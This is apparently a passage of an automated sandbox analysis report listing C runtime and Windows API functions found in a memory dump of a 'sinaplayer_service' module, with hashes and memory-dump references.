                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7871e681c44bacf4f4edd7089f7f481c4eb115c82fc70042aab4614f13f60944
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 582107B1A14744EBDF02DF68D88575ABBF8FF05304F0001AAE80987741D775AA14CBD2
                                                                                                                                                                                                    Function 6C55ED30 Relevance: 10.6, APIs: 7, Instructions: 61memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00EB0000,00000000,6C5CC0AD,00000000,?,00000000,?,6C56223C,6C5CC0AD,6C633B90,6C633B90,?,?,6C5CC0AD,?,00000000), ref: 6C55ED5D
                                                                                                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 6C5ADA8F
                                                                                                                                                                                                    • _callnewh.MSVCR120(6C5CC0AD,00000000,?,00000000,?,6C56223C,6C5CC0AD,6C633B90,6C633B90,?,?,6C5CC0AD,?,00000000,00000000,00000000), ref: 6C5ADAB3
                                                                                                                                                                                                    • _callnewh.MSVCR120(6C5CC0AD,00000000,?,6C56223C,6C5CC0AD,6C633B90,6C633B90,?,?,6C5CC0AD,?,00000000,00000000,00000000,00000000,00000000), ref: 6C5ADAD6
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,6C56223C,6C5CC0AD,6C633B90,6C633B90,?,?,6C5CC0AD,?,00000000,00000000,00000000,00000000,00000000), ref: 6C5ADADC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _callnewh$AllocHeap_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3215684309-0
                                                                                                                                                                                                    • Opcode ID: 8443406f0f1f2c823313234933007f77610fcffcaf719858e962391a143a4bcf
                                                                                                                                                                                                    • Instruction ID: f9a0a9ed333d1913b68454e5cd530755f57a77c8b3c8da1dc9c5d53433c6e900
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8443406f0f1f2c823313234933007f77610fcffcaf719858e962391a143a4bcf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B901D635345611EAD71077EA9C40BAE3358DBC2B68F14052ED9118BEE0DFB8DC0586A5
                                                                                                                                                                                                    Function 6C564EA2 Relevance: 10.6, APIs: 7, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __doserrno.MSVCR120(6C564F30,00000010), ref: 6C564E98
                                                                                                                                                                                                    • __doserrno.MSVCR120(6C564F30,00000010), ref: 6C5AE1BB
                                                                                                                                                                                                    • _errno.MSVCR120(6C564F30,00000010), ref: 6C5AE1C2
                                                                                                                                                                                                    • _errno.MSVCR120(6C564F30,00000010), ref: 6C5AE1F9
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6C564F30,00000010), ref: 6C5AE204
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2315031519-0
                                                                                                                                                                                                    • Opcode ID: 62168dc37f7642c56e7d49fef093bc0165ddb1f053ef1877f54edf93aea3c44c
                                                                                                                                                                                                    • Instruction ID: b8f764d857f8320ab7686d5d0ccf39f36216d73c847e175429ba6f240181774e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 62168dc37f7642c56e7d49fef093bc0165ddb1f053ef1877f54edf93aea3c44c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18119172905620DEC712DFAACC9079D76A0AF82328F560A45D4705BFF1CBF88D458BD6
                                                                                                                                                                                                    Function 6C57AACE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Name::operator+$NameName::
                                                                                                                                                                                                    • String ID: throw(
                                                                                                                                                                                                    • API String ID: 168861036-3159766648
                                                                                                                                                                                                    • Opcode ID: 12ab9fffbd68375bbf922e830ed161546be7b3dbf3b2948ddf59843471bbb146
                                                                                                                                                                                                    • Instruction ID: 987c549fe20afc3cdc8405d4b40fc0dd864499ffe77256bd235598fdb655d83e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12ab9fffbd68375bbf922e830ed161546be7b3dbf3b2948ddf59843471bbb146
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA019231640209EFDF14DFE4CC95EFE3BB9EB41344F004458E9089B690DB74AD898B94
                                                                                                                                                                                                    Function 6C5CC9A7 Relevance: 10.5, APIs: 7, Instructions: 31threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __get_tlsindex.MSVCR120 ref: 6C5CC9AA
                                                                                                                                                                                                    • __crtFlsGetValue.MSVCR120(00000000), ref: 6C5CC9B0
                                                                                                                                                                                                    • __get_tlsindex.MSVCR120(?), ref: 6C5CC9BF
                                                                                                                                                                                                    • __crtFlsSetValue.MSVCR120(00000000,?), ref: 6C5CC9C5
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6C5CC9D0
                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 6C5CC9D7
                                                                                                                                                                                                    • _freefls.MSVCR120(?), ref: 6C5CC9F3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Value__crt__get_tlsindex$ErrorExitLastThread_freefls
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 415173470-0
                                                                                                                                                                                                    • Opcode ID: c20a3cef1aadcd18c11d8d20fcae835332b28fe1df04e5b5874dcab92d44b4d6
                                                                                                                                                                                                    • Instruction ID: f73636475d631d2c3c352389122f2106852064dd155530c52a133cff722a26fc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c20a3cef1aadcd18c11d8d20fcae835332b28fe1df04e5b5874dcab92d44b4d6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BEF05E75604205DFC708AFB5CD4494A7BBAAF89208324855AE409CBB01EB39E885CAE0
                                                                                                                                                                                                    Function 6C5CC9FE Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,6C5A3F45,?), ref: 6C5CCA18
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 6C5CCA1F
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000), ref: 6C5CCA2B
                                                                                                                                                                                                    • DecodePointer.KERNEL32(00000001,6C5A3F45,?), ref: 6C5CCA48
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                                                                    • String ID: RoInitialize$combase.dll
                                                                                                                                                                                                    • API String ID: 3489934621-340411864
                                                                                                                                                                                                    • Opcode ID: 5047f566342702f791346682ac2d82c574b23b1b6886c8f943595c3c5d4a115d
                                                                                                                                                                                                    • Instruction ID: 07eb1f739bfa823314b454717623a1eb29c885ccd14b1dbc4bb3d44236b7aaf6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5047f566342702f791346682ac2d82c574b23b1b6886c8f943595c3c5d4a115d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9E01A707A8250ABDF30AF77CD8DB443A74F78270AF402524B10BDB080DB7950899A5D
                                                                                                                                                                                                    Function 6C5CCA56 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,6C5A3F0C), ref: 6C5CCA70
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 6C5CCA77
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000), ref: 6C5CCA82
                                                                                                                                                                                                    • DecodePointer.KERNEL32(6C5A3F0C), ref: 6C5CCA9D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                                                                    • String ID: RoUninitialize$combase.dll
                                                                                                                                                                                                    • API String ID: 3489934621-2819208100
                                                                                                                                                                                                    • Opcode ID: 4815a3d720ffd766f5254352b94df9e29458a2ca66fb2735d1ac38c0ca650adc
                                                                                                                                                                                                    • Instruction ID: 48c33eee56549bf8d1946fc3888efa9c72687ebfe519db269d96e7ec294388ec
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4815a3d720ffd766f5254352b94df9e29458a2ca66fb2735d1ac38c0ca650adc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CAE09274784340AAEF709F67CD8DB083A78F742306F10A428B10ADB580CB7994499F69
                                                                                                                                                                                                    Function 6C578C4C Relevance: 9.2, APIs: 6, Instructions: 167COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,00000000,00000000), ref: 6C578CAC
                                                                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,?), ref: 6C578CBB
                                                                                                                                                                                                    • memset.MSVCR120(00000019,00000000,00000101), ref: 6C578CD3
                                                                                                                                                                                                    • setSBCS.LIBCMT ref: 6C5A75F0
                                                                                                                                                                                                    • memset.MSVCR120(00000019,00000000,00000101,00000000,00000000,00000000), ref: 6C5A7670
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: memset$CodeInfoPageValid
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 344587817-0
                                                                                                                                                                                                    • Opcode ID: 1f7b9621056f6a1cb188b561ead9171cb4c5db5df3a57a8079795ff759083bf2
                                                                                                                                                                                                    • Instruction ID: 78148feaf1c6c76892c6ac6ee9fd83db1bc518d25222b296acacd8be9821cd61
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f7b9621056f6a1cb188b561ead9171cb4c5db5df3a57a8079795ff759083bf2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC5126719042458FDB20CFAACC807EEBBF5EF51308F20446FC4959BA61E7359546CB91
                                                                                                                                                                                                    Function 6C5DCF38 Relevance: 9.1, APIs: 6, Instructions: 148COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6C55F764: _getptd.MSVCR120(00000001,00000000,?,6C57E01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6C55F77A
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000001,?,00000000,00000000,6C633B90,6C5CC0DE), ref: 6C5DCF5A
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000001,?,00000000,00000000,6C633B90,6C5CC0DE), ref: 6C5DCF65
                                                                                                                                                                                                    • _stricmp_l.MSVCR120(00000001,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000001,?,00000000,00000000,6C633B90,6C5CC0DE), ref: 6C5DCF7F
                                                                                                                                                                                                    • __crtLCMapStringA.MSVCR120(00000000,?,00000200,00000002,00000002,?,00000002,?,00000001,00000000,00000000,00000000,00000004,00000000,00000000,00000000), ref: 6C5DCFC2
                                                                                                                                                                                                    • __crtLCMapStringA.MSVCR120(00000000,?,00000200,00000000,00000002,?,00000002,?,00000001,?,?,?,?,?,00000000,00000000), ref: 6C5DD04D
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000001,?,00000000,00000000), ref: 6C5DD0B6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: String__crt_errno$_getptd_invalid_parameter_noinfo_stricmp_l
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1992914148-0
                                                                                                                                                                                                    • Opcode ID: b6cfae906dbf84914c0c135dea50e33e46292a1bbb46c92c2bff56f3f78f5555
                                                                                                                                                                                                    • Instruction ID: a7f275e2f5eb9ab414c2c3c1b81604eec98bd00faf0453f6d461acca63b15e45
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6cfae906dbf84914c0c135dea50e33e46292a1bbb46c92c2bff56f3f78f5555
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3751697090435AABCB11CE5DCC40FEA77B4DB81318F258155E9908FAC1E336FA42DBA5
                                                                                                                                                                                                    Function 6C570891 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memcpy.MSVCR120(?,00000000,?), ref: 6C570923
                                                                                                                                                                                                    • _flsbuf.MSVCR120(00000000,?), ref: 6C57F7DB
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C58138C
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5A587E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_flsbuf_invalid_parameter_noinfomemcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 508512864-0
                                                                                                                                                                                                    • Opcode ID: d0212448698406f956a895f9bfeae6de57b1d50abaf86fbcc3e6df5cb2bb2f33
                                                                                                                                                                                                    • Instruction ID: 77e471555b62412c370689ec6db9092b7573896aea67924f5f579217765aed22
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0212448698406f956a895f9bfeae6de57b1d50abaf86fbcc3e6df5cb2bb2f33
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E841E870707715DBEB18CFA9CC805AF77A5EF85314B20862EE925C7E40EB31D9808B50
                                                                                                                                                                                                    Function 6C5C29BE Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCMT ref: 6C5C29E4
                                                                                                                                                                                                      • Part of subcall function 6C5C3D4A: InterlockedPopEntrySList.KERNEL32(?,?,6C5C29E9,00000000,?), ref: 6C5C3D54
                                                                                                                                                                                                      • Part of subcall function 6C5C3D4A: ??2@YAPAXI@Z.MSVCR120(00000010,?,6C5C29E9,00000000,?), ref: 6C5C3D69
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(00000000), ref: 6C5C2AF6
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,Function_000DCEE8,00000000), ref: 6C5C2B0B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Base::ChoreConcurrency::details::EntryExceptionInterlockedListRealizedSchedulerThrowstd::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2878774513-0
                                                                                                                                                                                                    • Opcode ID: aa806d5cc9849235bd320769d83546121245c14402170de068018585a830c1d8
                                                                                                                                                                                                    • Instruction ID: 427c8c8d941237147a7ee9f853d01303fe3515584bb67b4a9e253a098f380313
                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa806d5cc9849235bd320769d83546121245c14402170de068018585a830c1d8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F41BD30600201DFCB24DF66CC88B9ABBB4FF45328F11916DD80A8BB61D770D849CB91
                                                                                                                                                                                                    Function 6C5CACDD Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • QueryDepthSList.KERNEL32(?,00000000,?,?,?,?,6C5CAB93,?,?,?), ref: 6C5CAD53
                                                                                                                                                                                                    • InterlockedPushEntrySList.KERNEL32(?,?,?,?,?,?,6C5CAB93,?,?,?), ref: 6C5CAD6A
                                                                                                                                                                                                    • QueryDepthSList.KERNEL32(?,?,?,?,?,6C5CAB93,?,?,?), ref: 6C5CAD71
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,?,?,?,6C5CAB93,?,?,?), ref: 6C5CADA0
                                                                                                                                                                                                    • Concurrency::details::SafePointInvocation::InvokeAtNextSafePoint.LIBCMT ref: 6C5CADB5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: List$DepthInterlockedPointQuerySafe$Concurrency::details::EntryFlushInvocation::InvokeNextPush
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1206056122-0
                                                                                                                                                                                                    • Opcode ID: c1f61ab676bc9326a03df2bc47d09d4477065c402bd8391389568f028369948c
                                                                                                                                                                                                    • Instruction ID: f9cbe89b0a30721d798f5d88fc91676304e7a513569fde7dbe55c6f3e5036f00
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c1f61ab676bc9326a03df2bc47d09d4477065c402bd8391389568f028369948c
